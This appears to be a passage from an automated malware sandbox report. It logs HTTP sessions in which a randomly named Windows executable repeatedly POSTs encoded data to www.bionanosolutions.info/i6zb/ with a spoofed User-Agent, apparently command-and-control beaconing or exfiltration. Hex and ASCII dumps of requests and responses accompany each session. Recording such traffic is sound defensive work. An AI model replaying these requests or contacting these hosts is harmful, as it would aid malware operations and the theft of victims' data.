                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 74 44 5f 3d 66 30 30 78 55 56 4b 68 26 30 50 49 58 42 66 39 3d 79 5a 54 6d 6a 58 57 32 31 4e 71 35 77 68 39 31 49 4d 66 2f 6b 44 52 47 6b 55 5a 2b 58 54 32 6c 6b 76 33 6e 34 58 36 44 4d 6d 4d 7a 30 42 35 78 62 59 79 51 48 66 44 6e 61 63 6a 30 31 75 75 7a 65 63 36 34 42 41 72 69 2f 31 78 6e 79 42 6b 48 30 79 56 57 57 45 37 79 55 57 55 56 43 51 4a 39 35 45 78 58 73 66 55 54 42 4b 4b 4f 6b 34 32 4d 4d 61 6e 6c 45 32 75 58 66 2f 77 43 50 50 44 31 58 53 77 39 73 69 4d 69 4a 32 7a 65 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?tD_=f00xUVKh&0PIXBf9=yZTmjXW21Nq5wh91IMf/kDRGkUZ+XT2lkv3n4X6DMmMz0B5xbYyQHfDnacj01uuzec64BAri/1xnyBkH0yVWWE7yUWUVCQJ95ExXsfUTBKKOk42MManlE2uXf/wCPPD1XSw9siMiJ2ze"}</script></head></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.753153176.117.73.104803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:13:22.397254944 CET831OUTPOST /i6zb/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 220
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.bionanosolutions.info
                                                                  Origin: http://www.bionanosolutions.info
                                                                  Referer: http://www.bionanosolutions.info/i6zb/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 33 44 65 66 34 35 59 58 37 2b 6c 41 6b 79 72 41 62 77 71 39 68 74 46 53 69 2f 57 6c 41 48 4e 44 31 50 53 63 67 75 44 66 6d 4a 30 30 30 32 45 44 76 55 71 38 30 36 57 54 47 31 2f 2b 78 4e 68 51 68 52 6c 51 34 2b 55 76 37 4f 59 33 63 2b 4f 5a 6e 35 67 50 6c 47 74 69 38 39 59 6d 53 6c 46 73 67 64 65 2f 75 51 62 36 6d 2b 6a 75 66 61 53 38 37 4d 74 31 4e 71 7a 77 70 68 62 78 52 46 71 76 67 48 31 38 53 32 4a 4a 64 69 6f 64 6d 49 68 7a 58 62 5a 53 67 43 63 4f 42 73 68 73 33 6e 43 38 50 2b 7a 51 46 58 33 54 72 7a 30 34 62 6b 76 32 30 30 77 6e 5a 2b 6e 32 75 56 71 7a 35 56 50 31 54 44 57 59 52 36 4f 41 44 37 6b 6e 71 6e 61 50 4f 77 3d 3d
                                                                  Data Ascii: 0PIXBf9=3Def45YX7+lAkyrAbwq9htFSi/WlAHND1PScguDfmJ0002EDvUq806WTG1/+xNhQhRlQ4+Uv7OY3c+OZn5gPlGti89YmSlFsgde/uQb6m+jufaS87Mt1NqzwphbxRFqvgH18S2JJdiodmIhzXbZSgCcOBshs3nC8P+zQFX3Trz04bkv200wnZ+n2uVqz5VP1TDWYR6OAD7knqnaPOw==
                                                                  Nov 18, 2024 13:13:23.041517973 CET711INHTTP/1.1 405 Not Allowed
                                                                  Server: nginx/1.26.2
                                                                  Date: Mon, 18 Nov 2024 12:13:22 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 559
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED]
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.753154176.117.73.104803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:13:24.992558002 CET851OUTPOST /i6zb/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 240
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.bionanosolutions.info
                                                                  Origin: http://www.bionanosolutions.info
                                                                  Referer: http://www.bionanosolutions.info/i6zb/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 33 44 65 66 34 35 59 58 37 2b 6c 41 6b 53 62 41 49 44 79 39 70 74 46 64 38 76 57 6c 5a 33 4e 48 31 50 65 63 67 71 54 78 6d 36 41 30 30 54 34 44 39 6d 53 38 68 36 57 54 53 46 2f 2f 73 39 68 6c 68 52 35 59 34 2b 6f 76 37 4f 38 33 63 2b 2b 5a 6e 4f 30 4d 71 32 74 67 6c 74 59 6b 63 46 46 73 67 64 65 2f 75 51 6e 41 6d 2b 4c 75 44 34 47 38 39 6f 5a 30 41 4b 7a 7a 68 42 62 78 41 31 71 72 67 48 30 5a 53 7a 70 33 64 67 51 64 6d 4a 52 7a 58 76 46 52 72 43 63 4d 4f 4d 68 79 2b 31 66 6d 43 4f 62 7a 4b 42 2f 55 75 69 30 6b 61 53 75 55 75 57 38 4c 48 76 66 4e 71 58 4f 46 75 7a 53 41 52 43 53 41 63 59 36 68 63 4d 42 4e 6e 31 37 4c 59 45 56 72 32 46 37 70 30 31 6a 61 4d 4b 65 46 44 46 46 43 58 6a 63 3d
                                                                  Data Ascii: 0PIXBf9=3Def45YX7+lAkSbAIDy9ptFd8vWlZ3NH1PecgqTxm6A00T4D9mS8h6WTSF//s9hlhR5Y4+ov7O83c++ZnO0Mq2tgltYkcFFsgde/uQnAm+LuD4G89oZ0AKzzhBbxA1qrgH0ZSzp3dgQdmJRzXvFRrCcMOMhy+1fmCObzKB/Uui0kaSuUuW8LHvfNqXOFuzSARCSAcY6hcMBNn17LYEVr2F7p01jaMKeFDFFCXjc=
                                                                  Nov 18, 2024 13:13:25.766143084 CET711INHTTP/1.1 405 Not Allowed
                                                                  Server: nginx/1.26.2
                                                                  Date: Mon, 18 Nov 2024 12:13:25 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 559
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED]
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.753155176.117.73.104803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:13:27.777478933 CET1864OUTPOST /i6zb/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 1252
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.bionanosolutions.info
                                                                  Origin: http://www.bionanosolutions.info
                                                                  Referer: http://www.bionanosolutions.info/i6zb/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 33 44 65 66 34 35 59 58 37 2b 6c 41 6b 53 62 41 49 44 79 39 70 74 46 64 38 76 57 6c 5a 33 4e 48 31 50 65 63 67 71 54 78 6d 37 34 30 30 68 67 44 73 78 2b 38 7a 4b 57 54 52 46 2f 36 73 39 68 34 68 52 78 63 34 2b 6b 56 37 4d 55 33 64 64 47 5a 68 37 49 4d 78 6d 74 67 71 4e 59 70 53 6c 46 35 67 64 50 32 75 51 58 41 6d 2b 4c 75 44 34 71 38 71 73 74 30 54 36 7a 77 70 68 62 31 52 46 71 58 67 48 73 76 53 7a 6c 6e 65 51 77 64 6d 70 42 7a 4d 36 5a 52 33 53 63 4b 4a 4d 67 68 2b 31 53 34 43 4f 48 2f 4b 42 6a 36 75 67 6b 6b 61 6a 4c 59 77 45 34 4e 47 75 72 31 30 32 57 51 76 43 69 4b 62 42 53 48 63 5a 53 55 55 64 45 33 6a 56 62 7a 57 41 55 32 6b 58 58 58 34 47 44 68 44 74 6e 4b 65 47 74 64 50 47 47 4b 76 47 50 6d 37 72 39 7a 56 39 45 68 2b 49 44 67 4b 4d 68 66 4c 6c 4e 37 59 52 66 77 72 53 4d 70 34 33 31 65 34 56 32 4d 55 61 63 6a 6d 61 41 2b 70 51 6a 37 53 61 53 37 46 64 43 4a 41 61 71 4f 59 6f 4e 7a 47 55 54 37 6b 35 4b 68 33 68 4d 30 6d 4e 5a 7a 41 68 53 78 52 6d 35 6d 34 70 72 48 44 65 [TRUNCATED]
                                                                  Data Ascii: 0PIXBf9=3Def45YX7+lAkSbAIDy9ptFd8vWlZ3NH1PecgqTxm7400hgDsx+8zKWTRF/6s9h4hRxc4+kV7MU3ddGZh7IMxmtgqNYpSlF5gdP2uQXAm+LuD4q8qst0T6zwphb1RFqXgHsvSzlneQwdmpBzM6ZR3ScKJMgh+1S4COH/KBj6ugkkajLYwE4NGur102WQvCiKbBSHcZSUUdE3jVbzWAU2kXXX4GDhDtnKeGtdPGGKvGPm7r9zV9Eh+IDgKMhfLlN7YRfwrSMp431e4V2MUacjmaA+pQj7SaS7FdCJAaqOYoNzGUT7k5Kh3hM0mNZzAhSxRm5m4prHDeoRiM4bOG1x3AHRc+eAjEQt2sI5+y0mAFDlPCVczxBlKq+Jpqf2w9zxaIz/juQFsj9d+tC+CaSwmtPsvRoS7IMXyX1q7X0UEX7+mFzGzsOyl6719P5hmTTGC6bkcYRPHYDACJtUnHen+Z9MOxRfbL1gzsYIOP3CpakRXvz1ij8DdOcM0vJlNDNrVKBX3iqUHc20Syo5lAWUCd/8Dt2LuzyoRFC4dVHwI0df1G9T1Y2CjhdoDUstn/cYx+WnPyA+prKzOnFWlYPnwIx+qRGzk/Ijpvu6Q4X36j+hU+5b4tQOEXnzY8HB4pGjCxL2SB7DXlUsZoq6WNLWEJCUPqpINEXBoBTL3joStBRXsVL/hg+jLO7E5BZdDNk0x1AZWX8SyrFQ73V5i2h9G4eZhP9qs5GFdd3q8w4uCkxiBJe1hYGhtql9MaQm3syxjCCKgs/EBJdmkP2Ma9Qut8Xdozc0gQu8ip1JWoRgKAo87acgiwhjLudNUCWXC2+gnwsSRwEqWfJf9IcXOme1O3tkd1dW+6KkRhogBLXVLp4XWNFUZbN7PxGlJdOGsMbHdMS4ZYfpUvPY5DLPFG1Gea/K1Q4Y2SgOUIjm2QmO/S+Fl6f1dP5OwytAYS89VfE62Q2YY50hTGBPTYw/uXHI1RmrwYGpz8lhfn0K6hANwCgC [TRUNCATED]
                                                                  Nov 18, 2024 13:13:28.587275982 CET711INHTTP/1.1 405 Not Allowed
                                                                  Server: nginx/1.26.2
                                                                  Date: Mon, 18 Nov 2024 12:13:28 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 559
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED]
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.753156176.117.73.104803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:13:30.390229940 CET550OUTGET /i6zb/?0PIXBf9=6B2/7Ngl58s2pznOHRe+vJ9NgeSMQEkiwdm42/mNvrNW/DcFgEbztbyoGAni7ddU1GsG6dsX45s7M+CgnpRasEd6qu0hZk1EhvCSzFnjn53BAZCqqKYjVrue1TDSDBq9qg8+DFp/ZHMc&tD_=f00xUVKh HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.bionanosolutions.info
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Nov 18, 2024 13:13:31.532265902 CET1236INHTTP/1.1 200 OK
                                                                  Server: nginx/1.26.2
                                                                  Date: Mon, 18 Nov 2024 12:13:31 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 11694
                                                                  Last-Modified: Tue, 15 Oct 2024 10:38:56 GMT
                                                                  Connection: close
                                                                  ETag: "670e4640-2dae"
                                                                  Accept-Ranges: bytes
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Roboto;font-size:.875rem;-ms-text-size-adjust:100%;-moz-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-color:#000}button,input,textarea{font-family:Roboto;font-size:inherit;line-height:inherit;color:inherit;background-color:rgba(0,0,0,0)}input,textarea{width:100%}
                                                                  Nov 18, 2024 13:13:31.532334089 CET1236INData Raw: 62 75 74 74 6f 6e 2c 6f 70 74 69 6f 6e 2c 73 65 6c 65 63 74 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 75 6c 20 6c 69 7b 6c 69 73
                                                                  Data Ascii: button,option,select{cursor:pointer}a{color:inherit;text-decoration:none}ul li{list-style:none}img{vertical-align:top}h1,h2,h3,h4,h5,h6{font-weight:inherit;font-size:inherit}.lock body{overflow:hidden;touch-action:none;-ms-scroll-chaining:none
                                                                  Nov 18, 2024 13:13:31.532392979 CET1236INData Raw: 3a 30 3b 74 6f 70 3a 31 30 70 78 3b 77 69 64 74 68 3a 34 70 78 3b 68 65 69 67 68 74 3a 34 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 77 69 6e 64 6f 77 2d 6d
                                                                  Data Ascii: :0;top:10px;width:4px;height:4px;border-radius:50%;background-color:#fff}.window-main__actions{display:flex;justify-content:center}.window-main__actions a{min-height:34px;border:2px solid #2b313d;display:flex;flex-direction:column;justify-cont
                                                                  Nov 18, 2024 13:13:31.532521009 CET1236INData Raw: 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 34 2e 33 30 34 38 37 38 30 34 38 38 72 65 6d 20 2b 20 32 39 2e 30 32 34 33 39 30 32 34 33 39 76 77 20 2c 38 2e 39 33 37 35
                                                                  Data Ascii: .window-main{padding-left:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)}}@supports not (padding-left:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)){.window-main{padding-left:calc(1.5rem + 7.4375*(100vw - 20rem)/ 2
                                                                  Nov 18, 2024 13:13:31.532572985 CET1236INData Raw: 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 66 6f 6e 74 2d 73 69 7a 65 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 30 2e 39 31 34 36 33 34 31 34 36 33 72 65 6d 20 2b 20 32 2e 39 32 36 38 32 39 32 36 38 33 76 77 20 2c 32 2e 32 35 72 65 6d 29 29
                                                                  Data Ascii: 5)}}@supports (font-size:clamp(1.5rem ,0.9146341463rem + 2.9268292683vw ,2.25rem)){.window-main__title{font-size:clamp(1.5rem ,.9146341463rem + 2.9268292683vw ,2.25rem)}}@supports not (font-size:clamp(1.5rem ,0.9146341463rem + 2.9268292683vw ,
                                                                  Nov 18, 2024 13:13:31.532624006 CET1236INData Raw: 72 65 6d 20 2b 20 30 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 30 2e 36 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 6c 69 73 74 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 61 6c 63 28 2e 35 36 32 35 72 65 6d 20 2b 20 2e
                                                                  Data Ascii: rem + 0.487804878vw ,0.6875rem)){.window-main__list{padding-left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:clamp(0.75rem ,0.6524390244rem + 0.487804878vw ,0.875rem)){.window-main__item{padding-left:clamp(.75rem ,.6
                                                                  Nov 18, 2024 13:13:31.532674074 CET1236INData Raw: 68 20 64 3d 22 4d 33 36 30 2e 35 32 32 20 35 36 33 2e 34 32 31 43 33 36 30 2e 35 32 32 20 35 36 33 2e 34 32 31 20 32 37 36 2e 31 34 37 20 34 39 37 2e 34 34 38 20 32 35 37 2e 31 37 34 20 34 33 30 2e 38 31 34 43 32 33 38 2e 32 20 33 36 34 2e 31 38
                                                                  Data Ascii: h d="M360.522 563.421C360.522 563.421 276.147 497.448 257.174 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.696 231.133 363.018 262.356 381.991 328.99C287.99 418.472 360.522 563.421 360.522 563.421Z" fill="#00498D" /></g>
                                                                  Nov 18, 2024 13:13:31.533117056 CET1236INData Raw: 31 5f 66 5f 32 30 30 31 5f 35 22 20 78 3d 22 36 33 2e 38 35 39 31 22 20 79 3d 22 31 34 36 2e 33 31 39 22 20 77 69 64 74 68 3d 22 33 39 34 2e 35 34 34 22 20 68 65 69 67 68 74 3d 22 34 32 36 2e 31 34 32 22 20 66 69 6c 74 65 72 55 6e 69 74 73 3d 22
                                                                  Data Ascii: 1_f_2001_5" x="63.8591" y="146.319" width="394.544" height="426.142" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGr
                                                                  Nov 18, 2024 13:13:31.533165932 CET1236INData Raw: 3d 22 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 22 3e 59 6f 75 20 61 72 65 20 61 63 63 65 73 73 69 6e 67 20 74 68 65 20 73 69 74 65 20 76 69 61 20 48 54 54 50 53 2c 20 62 75 74 20 74 68 65 20 73 69 74 65 20 64 6f 65 73 20 6e 6f 74 20 68
                                                                  Data Ascii: ="window-main__item">You are accessing the site via HTTPS, but the site does not have an SSL certificate installed.</li><li class="window-main__item">Your domain has an AAAA record, but the site only works with IPv4 on the server.</li>
                                                                  Nov 18, 2024 13:13:31.533220053 CET806INData Raw: 65 22 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 46 6c 6f 6f 64 20 66 6c 6f 6f 64 2d 6f 70 61 63 69 74 79 3d 22 30 22 20 72 65 73 75 6c 74 3d 22
                                                                  Data Ascii: e" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" res


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.75315713.248.169.48803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:13:36.728044033 CET792OUTPOST /010v/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
